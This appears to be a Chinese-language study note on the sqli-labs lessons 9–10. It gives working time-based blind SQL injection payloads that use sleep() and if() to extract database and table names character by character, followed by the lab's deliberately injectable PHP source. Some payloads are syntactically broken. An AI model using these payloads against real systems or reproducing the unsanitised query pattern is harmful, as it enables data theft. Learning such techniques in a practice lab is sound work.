Less-9&10基于时间的盲注

基于时间的盲注
sleep（）将执行程序挂起一段时间
if（参数1,参数2，参数3）1正确执行2，错误执行3；
select sleep(3);
select if(database()='security',1,2);
select if(database()='security',sleep(5),NULL)name;
select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=100,sleep(5),NULL)name;

select * from table where id = input
1 and select sleep(5)--+;
select * from table where id = 'input'

1' and select sleep(5) --+;


 (select if(ascii(substr(database(),1,1))>100,sleep(5),NULL))--+


1' and (select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),NULL)name)--+

 
=》》
可得到结果

<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  echo '<font size="5" color="#FFFF00">';  echo 'You are in...........';  echo "<br>";    echo "</font>";  }else {echo '<font size="5" color="#FFFF00">';echo 'You are in...........';//print_r(mysql_error());//echo "You have an error in your SQL syntax";echo "</br></font>";echo '<font color= "#0000ff" font size= 3>';}}else { echo "Please input the ID as parameter with numeric value";}?>